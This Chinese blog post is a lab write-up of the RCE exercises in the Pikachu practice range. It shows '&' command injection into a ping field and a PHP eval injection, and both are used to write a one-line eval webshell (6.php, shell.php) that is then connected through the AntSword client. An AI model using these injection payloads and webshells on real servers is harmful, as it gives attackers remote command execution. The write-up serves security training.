技术栈

Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POSTcmd);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST"cmd")?>');

3.蚁剑连接

上一篇:红黑树
下一篇:云计算之网络
相关推荐
Hiyajo pray
17 小时前
SDN 访问控制性能调优方法
服务器·网络·网络安全
辣椒思密达
17 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
huainingning
18 小时前
交换机通过ftp下载文件或者传输文件到ftp服务器
运维·服务器·网络
edwarddamon
18 小时前
CentOS 7 国内安装 Docker CE(阿里云源)
运维
Championship.23.24
19 小时前
Linux 3.0 LVDS驱动开发详解
linux·运维·驱动开发·lvds
小池先生
19 小时前
Windows服务器如何备份
运维·服务器
风向决定发型丶
19 小时前
Shell中的特殊变量
linux·运维·bash
FII工业富联科技服务
20 小时前
灯塔工厂用例详解:AR 远程巡检与智能运维闭环落地实践
运维·ar
satadriver
20 小时前
手工加载API函数
安全
SLD_Allen
20 小时前
Purple Llama:Meta开源的LLM安全“紫队”工具箱
安全·开源·llama
热门推荐
012026年7月AI圈大地震:GPT-5.6被政府限制、Claude入驻Slack、Anthropic自研芯片02GitHub 镜像站点03AI科技热点日报 | 2026年07月01日04幻兽帕鲁 - 服务器管理员权限与 GM 命令完全指南05AI 编程 IDE 全景解析 2026:Agent 全面接管开发链路062026 国产 AI 大模型横评:DeepSeek、通义千问、Kimi、文心一言、星火、豆包谁更能打?07Codex 下载安装指南:Windows 和 macOS 官方版下载08国内可直接用、免费额度/永久免费的大模型API清单(含 SiliconFlow、火山、阿里、智谱、百度、Kimi、DeepSeek、DMXAPI 等)09GPT-5.5 对比 GPT-5.6 Sol、Terra、Luna:官方性能数据与选型分析102026 年 AI 大模型 & AI 编程工具实战全总结